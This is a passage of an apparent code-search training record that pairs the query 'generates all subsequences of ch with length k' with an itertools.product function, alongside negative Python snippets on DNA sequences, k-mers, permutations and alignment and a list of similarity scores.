codons.\"\n# elif len(dnainp)%3 is not 0:\n# print \"Warning: The provided DNA fragment does not contain an integer number of codons. Excess bases were leftout.\"\n while len(dnainp) >=3:\n cod = dnainp[:3]\n for i in codons:\n for j in i:\n if j == cod:\n protein = protein + aa[codons.index(i)]\n dnainp = dnainp[3:]\n return protein", "def final_finder(self, seq, init_length, fs):\n# print('call final_finder, input = '+seq)\n where_final=seq[init_length:]\n if len(where_final)>0:\n letter=where_final[0]\n if letter in fs:\n if len(where_final) > 1:\n yo = where_final[0] == 'ё'\n o = where_final[0] == 'о'\n if yo:\n final = where_final[0]\n len_final = 1\n elif o:\n if where_final[1] == 'й':\n final = where_final[:2]\n len_final = 2\n else:\n final = where_final[:1]\n len_final = 1\n elif where_final[1] in ['й','и','о','ю','у']:\n if where_final[:2] in fs:\n final=where_final[:2]\n len_final = 2\n else:\n final = letter\n len_final = 1\n elif where_final[1] == 'н':\n# print('second letter = n')\n# print('check')\n if len(where_final) > 2:\n if where_final[2] == 'ь' or where_final[2] == 'г':\n# print('third letter = ь or г')\n soft_sign = where_final[2] == 'ь'\n g = where_final[2] == 'г'\n if where_final[:3] in fs:\n# print('now find out if its rather initial')\n if len(where_final) > 3 and soft_sign:\n final = where_final[:3]\n len_final = 3\n elif len(where_final) > 3 and g:\n if where_final[3] in ['а','о','у','ы','э','я','ё','ю','и','е','ь']:\n final = where_final[:2]\n len_final = 2\n else:\n final = where_final[:3]\n len_final = 3\n else:\n final = where_final[:3]\n len_final = 3\n else:\n# print('no, theres no such combination of 3 symbols')\n final = where_final[:2]\n len_final = 2\n elif where_final[2] in ['а','о','у','ы','э','я','ё','ю','и','е']:\n# print('third letter = vowel')\n final = where_final[:1]\n len_final = 1\n else:\n final=where_final[:2]\n len_final = 2\n\n else:\n final=where_final[:2]\n len_final = 2\n\n else:\n final=where_final[0]\n len_final = 1\n else:\n final=where_final[0]\n len_final = 1\n elif where_final[:2] == 'йо':\n final = where_final[:2]\n len_final = 2\n else:\n# print('no such symbol, whitespace or Ъ')\n if letter == ' ':\n final='_'\n len_final = 1\n elif letter == 'ъ':\n final = '_'\n len_final = 1\n else:\n final = '_'\n len_final = 0\n else:\n final='_'\n len_final = 0 \n# print(final)\n return final, len_final", "def get_combinations_regexp(values):\n result = []\n for value in values:\n result.extend([value.lower(), value.upper(), value.title()])\n return '|'.join(result)", "def typoglycemia(sequence):\n words = sequence.split()\n\t\n for i in range(len(words)):\n if len(words[i]) > 4:\n word_partial = list(words[i][1:-1])\n random.shuffle(word_partial)\n word_shuffle = \"\".join(word_partial)\n words[i] = words[i][0] + word_shuffle + words[i][-1]\n \n return ' '.join(words)", "def match_accession(accession, rules_by_prefix_len):\n\n letter_match = LETTER_RE.match(accession)\n if letter_match is None:\n raise ValueError('an accession number must start with at least one capital letter, this does not: ' + accession)\n letter_prefix = letter_match.group(0)\n letter_match_length = len(letter_prefix)\n accession_type = ''\n if letter_match_length == 0:\n # this should never happen\n raise ValueError('an accession number must start with at least one capital letter, this does not: ' + accession)\n if letter_match_length < 3:\n accession_type = 'nucleotide'\n elif letter_match_length < 4:\n if letter_prefix in ('SRA', 'SRP', 'SRX', 'SRR', 'SRS', 'SRZ',\n 'ERA', 'ERP', 'ERX', 'ERR', 'ERS', 'ERZ',\n 'DRA', 'DRP', 'DRX', 'DRR', 'DRS', 'DRZ'):\n accession_type = 'SRA'\n else:\n accession_type = 'protein'\n elif letter_match_length in (4, 6):\n accession_type = 'WGS'\n elif letter_match_length == 5:\n accession_type = 'MGA'\n else:\n raise ValueError('an accession number must start with less than 7 capital letters, this does not: ' + accession_type)\n\n if accession[2] == '_':\n # details from https://www.ncbi.nlm.nih.gov/books/NBK21091/table/ch18.T.refseq_accession_numbers_and_mole/?report=objectonly\n # thanks to Torsten Seemann\n for prefix, database, molecule_type, type_description in rules_by_prefix_len['RefSeq']:\n accession_type = molecule_type\n if accession[:3] == prefix:\n return (database, accession_type, 'RefSeq: ' + type_description)\n\n rules = rules_by_prefix_len[letter_match_length]\n for rule in rules:\n (matcher, database, _, type_description) = rule\n if (isinstance(matcher, RuleMatcher) and matcher.matches(accession)) or letter_prefix == matcher:\n return (database, accession_type, type_description)", "def test_assign_seqs_fasta_plus_qual(self):\r\n\r\n # Handles single fasta and single qual\r\n file_data = {}\r\n file_data['fasta_files'] = [self.valid_fasta_file_no_errors]\r\n file_data['qual_files'] = [self.valid_qual_file_no_errors]\r\n file_data['demultiplexed_seqs_f'] = FakeOutFile()\r\n file_data['demultiplexed_qual_f'] = FakeOutFile()\r\n\r\n ids_bcs_added_field = {('AACTCGTCGATG', ''): 's1',\r\n ('AGCAGCACTTGT', ''): 's2', ('ACCGCAGAGTCA', ''): 's3'}\r\n bc_lens = [12]\r\n all_bcs = ['AACTCGTCGATG', 'AGCAGCACTTGT', 'ACCGCAGAGTCA']\r\n keep_barcode = False\r\n barcode_type = \"golay_12\"\r\n max_bc_errors = 1.5\r\n start_index = 1\r\n write_unassigned_reads = False\r\n disable_bc_correction = False\r\n added_demultiplex_field = None\r\n\r\n log_data, bc_freqs, seq_counts, corrected_bc_count =\\\r\n assign_seqs(file_data, ids_bcs_added_field, bc_lens, all_bcs,\r\n keep_barcode, barcode_type, max_bc_errors, start_index,\r\n write_unassigned_reads, disable_bc_correction,\r\n added_demultiplex_field)\r\n\r\n expected_demultiplexed_fasta_seq = \">s1_1 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\nCAGGACGAGACGAGGTT\\n>s3_2 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\nCCAGATTACGAGATTA\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\nGACCGATTACGATAACG\\n\"\r\n expected_demultiplexed_qual_seq = '>s1_1 ABCD0001 orig_bc=AACTCGTCGATG new_bc=AACTCGTCGATG bc_diffs=0\\n30 26 11 11 29 20 19 16 24 17 29 28 11 27 14 24 24\\n>s3_2 EFGH0002 orig_bc=ACCGCAGAGTCA new_bc=ACCGCAGAGTCA bc_diffs=0\\n12 14 27 23 22 19 24 18 19 20 28 10 17 14 17 13\\n>s2_3 IJKL0003 orig_bc=AGCAGCACTTGT new_bc=AGCAGCACTTGT bc_diffs=0\\n10 20 16 20 25 27 22 28 16 22 16 18 12 13 16 25 17\\n'\r\n\r\n self.assertEqual(file_data['demultiplexed_seqs_f'].data,\r\n expected_demultiplexed_fasta_seq)\r\n self.assertEqual(file_data['demultiplexed_qual_f'].data,\r\n expected_demultiplexed_qual_seq)\r\n\r\n expected_log_data = {'ACCGCAGAGTCA,s3': 1, 'AACTCGTCGATG,s1': 1,\r\n 'AGCAGCACTTGT,s2': 1}\r\n expected_bc_freqs = {'AACTCGTCGATG': 1, 'AGCAGCACTTGT': 1,\r\n 'ACCGCAGAGTCA': 1}\r\n expected_seq_counts = 3\r\n expected_corrected_bc_count = [0, 0]\r\n\r\n self.assertEqual(log_data, expected_log_data)\r\n self.assertEqual(bc_freqs, expected_bc_freqs)\r\n self.assertEqual(seq_counts, expected_seq_counts)\r\n self.assertEqual(corrected_bc_count, expected_corrected_bc_count)", "def getSecondStrand(sequences):\n compDNA = []\n for dna in sequences:\n compDNAAux = dna.replace('A', 't')\n compDNAAux = compDNAAux.replace('T', 'a')\n compDNAAux = compDNAAux.replace('C', 'g')\n compDNAAux = compDNAAux.replace('G', 'c')\n compDNA.append(compDNAAux.upper())\n\n for i in range(0, len(compDNA)):\n compDNA[i] = compDNA[i][::-1]\n\n return compDNA", "def initial_finder(self, seq, ins):\n# print('call initial_finder, input = '+seq)\n letter=seq[0]\n if letter in ins:\n if letter in ['д','т','ц','с']:\n next_letter=seq[:2]\n if next_letter in ins:\n initial=next_letter\n len_init=2\n else:\n initial=letter\n len_init=1\n else:\n initial=letter\n len_init=1 \n else:\n initial='_'\n len_init=0\n# print(initial)\n return initial, len_init", "def trifeca(word: str):\n last_letter = 'None'\n last_pair_matched = False\n consecutive_matching_pairs = 0\n\n for letter in word:\n if last_pair_matched:\n last_pair_matched = False\n last_letter = letter\n continue\n\n if letter == last_letter:\n last_pair_matched = True\n consecutive_matching_pairs += 1\n \n if consecutive_matching_pairs == 3:\n return True\n else:\n consecutive_matching_pairs = 0\n last_letter = letter \n \n return False", "def transcribe(seq):\n rna = ''\n for letter in seq:\n if letter == 'A':\n rna = rna + 'U'\n elif letter == 'T':\n rna = rna + 'A'\n elif letter == 'G':\n rna = rna + 'C'\n else:\n rna = rna + 'G'\n return rna", "def process_sequences(sequences: list):\n transformed_sequences = transform_sequences(sequences)\n profile = calculate_profile(transformed_sequences)\n consensus = get_consensus(profile)\n\n print(consensus)\n bases = [\"A\", \"C\", \"G\", \"T\"]\n for i, counts in enumerate(profile):\n counts = [str(count) for count in counts]\n print(\"{}: {}\".format(bases[i], \" \".join(counts)))", "def find_substitutes(text):\n if CHAINS == {}:\n generate_food_chains()\n\n candidates = []\n subs = []\n for i in range(len(text)):\n char = text[i]\n if CHAINS.get(char):\n candidates = []\n candidates = CHAINS[char]\n else:\n if candidates != []:\n # choose the most popular option from candidates\n counts = {}\n for candidate in candidates:\n if counts.get(candidate):\n counts[candidate] += 1\n else:\n counts[candidate] = 1\n max_count = 0\n chosen = None\n for candidate, count in counts.iteritems():\n if count > max_count:\n max_count = count\n chosen = candidate\n if chosen:\n subs.append((chosen, i))\n\n candidates = []\n return subs", "def convert_ambigs(strings, alph):\n ms = alph.translator(False)\n for i in range(len(strings)):\n strings[i] = strings[i].translate(ms)\n return(strings)", "def only_choice(values):\n for unit in unitlist:\n for d in '123456789':\n # array of boxes for the digit d\n destinations = [b for b in unit if d in values[b]]\n if len(destinations) == 1:\n values = assign_value(values, destinations[0], d)\n return values", "def sequence_align(string_v, string_w):\n m = len(string_v)\n n = len(string_w)\n\n # Initialization; D[i][j][0] contains the max alignment score of the\n # ith prefix of v and the jth of w; D[i][j][1] contains the back pointer.\n D = [[(0, START) for _ in range(n + 1)] for _ in range(m + 1)]\n\n for i in range(1, m + 1):\n D[i][0] = (D[i - 1][0][0] + blosum['-', string_v[i - 1]], DELETE)\n\n for j in range(1, n + 1):\n D[0][j] = (D[0][j - 1][0] + blosum['-', string_w[j - 1]], INSERT)\n\n # Recurrence\n for i in range(1, m + 1):\n for j in range(1, n + 1):\n insert = D[i][j-1][0] + blosum['-', string_w[j - 1]]\n delete = D[i-1][j][0] + blosum[string_v[i - 1], '-']\n substitute = D[i-1][j-1][0] + blosum[string_v[i - 1], string_w[j - 1]]\n # Set D[i][j] to the max of the recurrences\n if insert > delete and insert > substitute:\n D[i][j] = (insert, INSERT)\n elif delete > substitute:\n D[i][j] = (delete, DELETE)\n else:\n D[i][j] = (substitute, SUBSTITUTE)\n\n i, j = m, n\n v_aligned = ''\n w_aligned = ''\n back_pointer = D[i][j][1]\n while back_pointer != START:\n if back_pointer == INSERT:\n j -= 1\n v_aligned = '-' + v_aligned\n w_aligned = string_w[j] + w_aligned\n\n \n elif back_pointer == DELETE:\n i -= 1\n v_aligned = string_v[i] + v_aligned\n w_aligned = '-' + w_aligned\n\n elif back_pointer == SUBSTITUTE:\n i -= 1\n j -= 1\n v_aligned = string_v[i] + v_aligned\n w_aligned = string_w[j] + w_aligned\n\n \n back_pointer = D[i][j][1]\n \n return v_aligned, w_aligned", "def createAlignment(sequences, alphabet):\n align = Alignment(alphabet)\n counter = 0\n for sequence in sequences:\n name = \"sequence\" + str(counter)\n align.add_sequence(name, sequence)\n counter+=1\n return align" ]
[ "0.58296806", "0.57344776", "0.57000065", "0.569295", "0.5626267", "0.5622596", "0.56082696", "0.56058365", "0.5604716", "0.55872947", "0.5555464", "0.5515502", "0.55089283", "0.54992986", "0.5488709", "0.5476587", "0.54706156", "0.54512507", "0.5450281", "0.5441451", "0.54327196", "0.542411", "0.5411", "0.54061323", "0.53986025", "0.5391094", "0.53775454", "0.53768015", "0.53597414", "0.53574", "0.5323872", "0.53233784", "0.53160083", "0.53122944", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5299169", "0.5278213", "0.527145", "0.5270026", "0.52620333", "0.5256478", "0.5242583", "0.522927", "0.5223555", "0.5220937", "0.52117187", "0.5210697", "0.5202933", "0.5201367", "0.5199239", "0.51977617", "0.5194704", "0.51941395", "0.5190418", "0.51876783", "0.5185242", "0.51695544", "0.5168487", "0.5168165", "0.51608324", "0.5158871", "0.5149529", "0.51388264", "0.5138707", "0.5136198", "0.51327264", "0.51302856", "0.5126118", "0.51260537", "0.51194453", "0.5118848", "0.5109988", "0.51090217", "0.5105424", "0.51038414", "0.51034504", "0.510108", "0.50966793", "0.50957364", "0.5090317", "0.50850147", "0.50835884", "0.50781256", "0.50778294", "0.50690264", "0.50637543", "0.5063092", "0.5059926", "0.50532407", "0.5052397", "0.5048314", "0.5043831", "0.50389993" ]
0.5192423
60
generates all subsequences of ch with length k
def generateSubSequences(k, ch): seq = ["".join(c) for c in itertools.product(ch, repeat = k)] # discussion about the best way to do this: # https://stackoverflow.com/questions/7074051/what-is-the-best-way-to-generate-all-possible-three-letter-strings return seq
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_kmers(seq, k):\n\n return [seq[i:i+k] for i in range(len(seq)-k+1)]", "def cut_kmer(sequence, k_mer):\n for i in range(0, len(sequence)-k_mer + 1):\n yield sequence[i:i+k_mer]", "def kmer_list(s, k):\n kmer = []\n n = len(s)\n # n-k+1 is the available range of values or probablities.\n for x in range(0, n-k+1):\n kmer.append(s[x:x+k])\n return kmer", "def __permutation(orgset, k):\n if k == 1:\n for i in orgset:\n yield (i,)\n elif k > 1:\n for i, x in enumerate(orgset):\n # iterates though to near the end\n for s in __permutation(orgset[:i] + orgset[i + 1 :], k - 1):\n yield (x,) + s", "def pattern_list(k):\r\n p_list=[]\r\n for i in list(itertools.product('ACGT', repeat=k)):\r\n x = ''.join(i)\r\n p_list.append(x)\r\n return p_list", "def get_kmers(seq,k=2):\n pair_list = []\n for i in range(0,len(seq),k):\n pair_list.append(str(seq)[i:i+k])\n return pair_list", "def kmer_set(s, k):\n kmer = set([])\n n = len(s)\n #n-k+1 is the available range of values or probablities.\n for x in range(0, n - k + 1):\n kmer.add(s[x:x + k])\n return kmer", "def get_subsets(l, k):\n if k == 0:\n return [[]]\n else:\n res = []\n for i in range(len(l)):\n rest_subsets = get_subsets(l[i + 1:], k - 1)\n for subset in rest_subsets:\n subset.insert(0, l[i])\n res += rest_subsets\n return res", "def seq_reconstruct(k, d, kmers):\n seq = []\n for p in kmers:\n seq.append(p[0])\n for i in reversed(range(1, 2 * k + d - 1)):\n print(i)\n seq.append(kmers[-i][-1])\n return \"\".join(seq)", "def shingle(s, k):\n k = min(len(s), k)\n for i in range(len(s) - k + 1):\n yield s[i:i+k]", "def cut_kmer(sequence, kmer_size):\n for i in range(len(sequence)-kmer_size+1):\n yield sequence[i:i+kmer_size]", "def get_all_pandigitals(i, k):\n l = range(i, k + 1)\n return itertools.permutations(l)", "def get_paths_of_length_k(subpaths, k):\r\n subpaths_of_length_k = [i for i in subpaths if len(\r\n i) == k] # all k-length subpaths\r\n subpaths = [i for i in subpaths if len(i) != k] # remove k-length subpaths\r\n return subpaths_of_length_k, subpaths", "def get_subsequence(a, k):\n if k > len(a):\n return None\n dp = [0] * len(a)\n aux = [inf] * (k + 1)\n aux[0] = -inf\n high = 0\n for i in range(len(a)):\n dp[i] = bisect_left(aux, a[i])\n aux[dp[i]] = min(aux[dp[i]], a[i])\n high = max(high, dp[i])\n if high == k:\n return aux[1:]\n return None", "def iter_strings_k(n, k, m):\n # initial state -- all zeros\n state = np.zeros((n,), dtype=int)\n\n if k == 0:\n # that was it (!)\n return\n\n while True:\n #print(f\"next state is {state=}\")\n yield state\n\n # Update to next state. Idea is to count and carry as usual, except if\n # there are already k nonzeros in which case we count and carry by\n # ignoring all the trailing zeros. This is the algorithm described here\n # - https://stackoverflow.com/a/10458380/1694896 - adapted from bits to\n # base-m \"mits\"\n if np.count_nonzero(state) < k:\n _add_and_carry_in_place(state, m)\n continue\n\n # there are k nonzeros already, find first nonzero from least\n # significant end. See https://stackoverflow.com/a/52911347/1694896\n last_nonzero = np.max(np.nonzero(state))\n # and increment that one\n _add_and_carry_in_place(state, m, last_nonzero)\n if not np.any(state):\n # end of iteration reached, as we've gone back to the all-zero\n # state.\n return", "def find_partitions(V,k):\n k_subs = k_subset(V,k)\n k_subs = uniq_subsets(k_subs)\n\n return k_subs", "def TAoCPpermutation(n,k):\n perms = []\n for subset in itertools.combinations(range(n), k):\n A = []; B = []; C = []; min = 0; j = 0; up = 0\n for i in xrange(n):\n if(j>=k or i != subset[j]):\n B.append(i)\n up +=1\n else:\n up -=1\n j += 1\n if(up < min):\n min = up\n B.append(i)\n else:\n A.append(i)\n C.append(B.pop())\n perms.append(A+B+C)\n return perms", "def kmer(text, i, k):\r\n return text[i:(i+k)]", "def kmer(text, i, k):\r\n return text[i:(i+k)]", "def Combinations(n, k):\n if int(n) != n or int(k) != k or n < k or k <= 0:\n return None\n\n if k == n:\n return [range(n)]\n elif k == 1:\n return [[ii] for ii in range(n)]\n\n combinations = Combinations(n-1, k)\n combinations_append_last = Combinations(n-1, k-1)\n for ii in range(len(combinations_append_last)):\n combination = combinations_append_last[ii]\n combination.append(n-1)\n combinations.append(combination)\n return combinations", "def randomKmers(dna, k):\n kmers = []\n for seq in dna:\n n = len(seq)\n i = random.randint(0, n-k)\n kmer = seq[i:i+k]\n kmers.append( kmer)\n return kmers", "def generate_kmers(k):\n\n kmers_list = []\n kmers_tuples = itertools.product('ACGT', repeat=k)\n for kmer in kmers_tuples:\n kmers_list.append(''.join(kmer))\n\n return kmers_list", "def de_bruijn(k, n):\n alphabet = k\n k = len(k)\n\n a = [0] * k * n\n sequence = []\n\n def db(t, p):\n if t > n:\n if n % p == 0:\n sequence.extend(a[1:p + 1])\n else:\n a[t] = a[t - p]\n db(t + 1, p)\n for j in range(a[t - p] + 1, k):\n a[t] = j\n db(t + 1, t)\n\n db(1, 1)\n sequence.extend(sequence[:n - 1])\n\n return \"\".join(alphabet[i] for i in sequence)", "def subsets(x, k):\n sub_set = set()\n for i in x:\n sub_set = sub_set.union(set(combinations(i, k)))\n return list(sub_set)", "def partitions(n, k):\n if k == 1:\n yield (n,)\n return\n for i in range(1, n):\n for p in partitions(n-i, k-1):\n yield (i,) + p", "def beautifulSubsets(self, nums: List[int], k: int) -> int:\n\n \"\"\"\n queue = deque([([], -1)])\n res = 0\n\n while queue:\n cur, idx = queue.popleft()\n res += 1\n\n for i in range(idx + 1, len(nums)):\n if nums[i] - k in cur or nums[i] + k in cur:\n continue\n\n queue.append((cur + [nums[i]], i))\n\n return res - 1\n \"\"\"\n\n \"\"\"\n # dp0 is the ways that without A[i]\n # dp1 is the ways that with A[i]\n\n count = [Counter() for i in range(k)]\n for n in nums:\n count[n % k][n] += 1\n\n res = 1\n for i in range(k):\n prev, dp0, dp1 = 0, 1, 0\n for n in sorted(count[i]):\n v = pow(2, count[i][n])\n if prev + k == n:\n dp0, dp1 = dp0 + dp1, dp0 * (v - 1)\n else:\n dp0, dp1 = dp0 + dp1, (dp0 + dp1) * (v - 1)\n\n prev = n\n\n res *= dp0 + dp1\n\n return res - 1\n \"\"\"\n\n # Count the frequency of A, and then consider all the arithmetic sequence with difference k.\n # Each arithmetic sequence can be solve as a hourse robber problem.\n # We solve the hourse robber by dp.\n # dp(a) return the result for sequence no bigger than a.\n\n # dp(a)[0] is the ways that without a\n # dp(a)[1] is the ways that with a\n\n # dp(a)[0] = dp(a - k)[0] + dp(a - k)[1]\n # dp(a)[1] = dp(a - k)[0] * (2 ^ count(a) - 1\n\n count = Counter(nums)\n\n def dp(n):\n dp0, dp1 = dp(n - k) if n - k in count else (1, 0)\n return dp0 + dp1, dp0 * (pow(2, count[n]) - 1)\n\n return functools.reduce(operator.mul, (sum(dp(n)) for n in count if not count[n + k])) - 1", "def weak_compositions(n, k):\n if n < 0 or k < 0:\n return\n elif k == 0:\n # the empty sum, by convention, is zero, so only return something if\n # n is zero\n if n == 0:\n yield []\n return\n elif k == 1:\n yield [n]\n return\n else:\n # For each first integer i in range(n+1), list all compositions\n # on n-i nodes, of length at most k-1.\n for i in range(n+1):\n for comp in weak_compositions(n-i, k-1):\n yield [i] + comp", "def build(s, k, T):\n L = len(T)\n f = int(''.join(T) + str(s))\n sf = k * f\n tail = str(sf)[-(L+1):]\n # print('Multiplying %s by %s gives %s (...%s)' % (f, k, sf, tail))\n assert len(tail) == L + 1\n T = list(tail)\n return T", "def enumerate_kmers(string, k, start=0):\n for i in range(0, len(string) - k + 1):\n yield start + i, string[i:i+k]", "def Get(self,k:int): \n ### get partitions depending on the partition schemes C that depends on k!\n return subsets_k(list(range(self._n)),k)", "def allpermutations(orgset, k):\n return itertools.chain(*[permutation(orgset, i) for i in range(1, k + 1)])", "def k_subsets(set_, k):\n ensure_countable(set_)\n\n if not isinstance(k, Integral):\n raise TypeError(\"subset cardinality must be a number\")\n if not (k >= 0):\n raise ValueError(\"subset cardinality must be positive\")\n if not (k <= len(set_)):\n raise ValueError(\"subset cardinality must not exceed set cardinality\")\n\n result = combinations(set_, k)\n return _harmonize_subset_types(set_, result)", "def permute(n: int, k: int) -> int:\n\n # no possible permutations if k > n\n if n < k:\n return 0\n\n # if faster, compute n! and (n - k)! and return their quotient\n fact_count = len(_factorial_sequence)\n if n - fact_count <= k:\n return factorial(n) // factorial(n - k)\n\n # compute the product (n - k + 1) * (n - k + 2) * ... * n\n return seqs.arithmetic_product(n - k + 1, k)", "def cut_kmer(sequence, kmer_size):\n for i in range(len(sequence)-kmer_size+1):\n try:\n yield sequence[i:kmer_size+i]\n except StopIteration:\n return", "def string_to_kmers(s: str, k: int) -> List[str]:\n for i in range(0, len(s), k):\n yield s[i:i + k]", "def count_subsequence_in_sliding_window(kmin, kmax, sequence):\n if isinstance(sequence, str):\n for n in range(kmin, kmax + 1):\n for sub in zip(*(deque(itertools.islice(it, i), 0) or\n it for i, it in enumerate(itertools.tee(sequence,\n n)))):\n yield ''.join(sub)", "def kmers_from_dna(dna, k):\n assert k >= 1\n assert len(dna) >= k\n\n assert len(dna) >= k\n for i in range(0, len(dna) - k + 1):\n kmer = dna[i:i + k]\n yield kmer", "def rotate(self, nums, k):\n length=len(nums)\n nums[:]=nums[length-k:length]+nums[0:length-k]\n return nums", "def partial_permutations(n, k):\n return int((factorial(n) / factorial(n - k)) % 1000000)", "def Split(self, k):\n n = len(self)\n start = range(0, n, ceil(n / k))\n end = list(start[1:]) + [n]\n return [range(first, last) for first, last in zip(start, end)]", "def getKmers(seq, k):\n \n kmd = {}\n \n for i in range(len(seq)+1-k):\n kmer = seq[i:i+k]\n kmd[kmer] = kmd.get(kmer,0) + 1\n return kmd", "def kmers(sequence, alphabet, k):\n mers = (''.join(c) for c in windowed(k, sequence))\n return [mer for mer in mers if all(base in set(alphabet) for base in mer)]", "def compute_freq(text, k):\n freq_array = [0 for i in range(0, 4**k)]\n for i in range(0, len(text) - k + 1):\n pattern = text[i:i + k]\n j = pattern_to_number(pattern)\n freq_array[j] += 1\n # return ' '.join([str(i) for i in freq_array])\n return freq_array", "def combo(N,K):\n assert type(N)==list\n assert type(K)==int\n for k in N:\n assert type(k)==int\n assert K>0 and K<=len(N)\n \n main_combo = []\n #Finds the power list of the inputted list and loops through the power list for lists with length 'K'.\n for l in power_list(N):\n if len(l)==K:\n main_combo.append(l)\n return main_combo #Returns a list of list combinations with length 'K'.", "def numKLenSubstrNoRepeats(self, S, K):\n return self.for_loop(S, K)", "def rotate(nums: List[int], k: int) -> None:\n def fragReverse(left_index: int, right_index: int, frag: List[int]):\n while left_index < right_index:\n frag[left_index], frag[right_index] = frag[right_index], frag[left_index]\n left_index += 1\n right_index -= 1\n \"\"\"方案六:切片翻转法\"\"\"\n m = abs(k) % len(nums)\n if m == 0:\n return\n nums.reverse()\n if k > 0:\n fragReverse(0, m - 1, nums)\n fragReverse(m, len(nums) - 1, nums)\n elif k < 0:\n fragReverse(0, len(nums) - 1 - m, nums)\n fragReverse(len(nums) - m, len(nums) - 1, nums)", "def _get_exact_k_skip_n_grams(arr, n, k):\n for i in range(len(arr) - n - k + 1):\n part = arr[i:i+n+k]\n\n if k == 0:\n yield part\n else:\n for j in combinations(part[1:-1], n - 2):\n yield tuple([part[0]] + list(j) + [part[-1]])", "def get_subs(n):\n \n from itertools import product\n return [''.join(sub) for sub in product('CATGN', repeat=n)]", "def __combination(orgset, k):\n if k == 1:\n for i in orgset:\n yield (i,)\n elif k > 1:\n for i, x in enumerate(orgset):\n # iterates though to near the end\n for s in __combination(orgset[i + 1 :], k - 1):\n yield (x,) + s", "def get_mers(sequence, kmin, kmax):\n for k in range(kmin, kmax + 1):\n return (''.join(mers) for mers in windowed(sequence, k))", "def find_kmers(in_fasta, k):\n n= len(in_fasta)-k+1\n kmers=[]\n for i in range(0, n):\n kmers.append(in_fasta[i:i+k])\n return(kmers)", "def main():\n check_input(sys.argv[0])\n with open(sys.argv[1]) as infile:\n n = int(infile.readline().strip())\n k = int(infile.readline().strip())\n\n print(partial_permutations(n, k))", "def kchainbasis(h, k):\n\n import itertools as it\n kchains = set()\n for e in h.edges():\n if len(e) == k + 1:\n kchains.add(tuple(sorted(e.uidset)))\n elif len(e) > k + 1:\n kchains.update(set(it.combinations(sorted(e.uidset), k + 1)))\n return sorted(list(kchains))", "def rotate(nums, k):\n nums = nums[(len(nums) - k):] + nums[:(len(nums) - k)]", "def build_kmers(\n sequence, \n ksize):\n\n kmers = list()\n n_kmers = len(sequence) - ksize + 1\n # Loop to store khmers in each sequence\n for i in range(n_kmers):\n kmer = sequence[i:i + ksize]\n kmers.append(kmer)\n \n return kmers, n_kmers\n\n # It is an example that needs to say the size of Kmer you would like.", "def get_chunks(indivs, k):\r\n\tpair_chunk_collection=[]\r\n\tfor i in xrange(0, len(indivs[0])-k+1, k):\r\n\t\tchunks=[]\r\n\t\tfor x in indivs:\r\n\t\t\tchunks.append(x[i:i+k])\r\n\t\tpartial_phase_pairs=tune_em(chunks, 5)[1]\r\n\t\tprint partial_phase_pairs\r\n\t\tpair_chunk_collection.append(partial_phase_pairs)\r\n\treturn pair_chunk_collection", "def kmers_composition(dna: str, k: int, alphabet: str = \"ACGT\"):\n dna = Counter(string_to_kmers(dna, k))\n for k_mer in enumerate_kmers(alphabet, k):\n yield dna[k_mer]", "def create_kmers(seq,kmer_size):\n\n return [seq[i:(i+kmer_size)] for i in range(len(seq)-kmer_size+1)]", "def kmer_count(self,size):\n if size == 1:\n return ['A','T','C','G']\n else:\n result = []\n for seq in Analyze_DNA_Sequence.kmer_count(self,size-1):\n for base in ['A','T','C','G']:\n result.append(seq+base)\n return result", "def choices(symbols, k):\n return [R.choice(symbols) for _ in range(k)]", "def sol(s, k):\n f = [0]*26\n for x in s:\n f[ord(x)-97] -= 1\n # We store the negative of the frequencies\n \n heapq.heapify(f)\n # Make it a max heap\n \n while k and f:\n d = heapq.heappop(f)\n heapq.heappush(f, d+1)\n # Reduce the max frequency by 1 and k by 1 till k exists\n k-=1\n \n res = 0\n for x in f:\n res += x**2\n # Return the result, we dont care for the '-' since its gets squared\n return res", "def split_list(l, k):\n\n\tn = len(l)\n\tsublists = []\n\tnsubs = n / k\n\tnrems = n % k\n\n\t# little algo to split lists.\n\n\ti = int(0)\n\twhile i < n:\n\t\tsublists.append(l[i:i+k])\n\t\ti += k\n\n\treturn sublists", "def restricted_growth_sequences(n):\n # k - biggest value that should be contained in subsequence\n for k in range(n):\n # initially seq = [0, 0, ... 0, 1, 2, ..., k-1, k]\n seq = [0] * (n - k) + list(range(1, k+1))\n # final = [0, 1, 2, ..., k-1, k, ..., k]\n final = list(range(k)) + [k] * (n - k)\n while seq != final:\n yield seq\n seq = next_rgs(seq, n, k)\n yield final", "def enumerate_kmers(alphabet: Union[str, List[str]], length: int):\n for value in itertools.product(alphabet, repeat=length):\n yield \"\".join(value)", "def retrieve_sub(s, n):\n subs = []\n for idx, char in enumerate(s):\n sub = char\n c = 1\n for next_char in s[idx + 1:]:\n if c >= n:\n break\n else:\n sub += next_char\n c += 1\n subs.append(sub)\n return [x for x in subs if len(x) == n]", "def permutations(k: int) -> int:\n return factorial(k)", "def marbles(n: int, k: int) -> int:\n # return (n-1) Choose (k - 1)\n # which is the number of possibilities with the given constraints.\n return n_choose_k(n - 1, k - 1)", "def sample_n_k(n, k):\n\n if not 0 <= k <= n:\n raise ValueError(\"Sample larger than population or is negative\")\n if k == 0:\n return np.empty((0,), dtype=np.int64)\n elif 3 * k >= n:\n return np.random.choice(n, k, replace=False)\n else:\n result = np.random.choice(n, 2 * k)\n selected = set()\n selected_add = selected.add\n j = k\n for i in range(k):\n x = result[i]\n while x in selected:\n x = result[i] = result[j]\n j += 1\n if j == 2 * k:\n # This is slow, but it rarely happens.\n result[k:] = np.random.choice(n, k)\n j = k\n selected_add(x)\n return result[:k]", "def batch(iterable, k=3):\n\n for i in range(0, len(iterable), k):\n yield iterable[i:i + k]", "def next_rgs(seq, n, k):\n # b[i] = max(seq[i - 1], b[0], ..., b[i - 1]) = max(seq[i - 1], b[i - 1])\n # All restricted growth sequences start with 0\n b = [0]\n result = seq[:]\n for i in range(1, n):\n b.append(max(seq[i - 1], b[i - 1]))\n # Find the earliest index when previous and next sequence are diverging\n for j in range(n - 1, 0, -1):\n if seq[j] + 1 > k:\n continue\n if seq[j] > b[j]:\n continue\n break\n # Create components of new result\n # prefix - maximal common prefix of original and new sequence\n 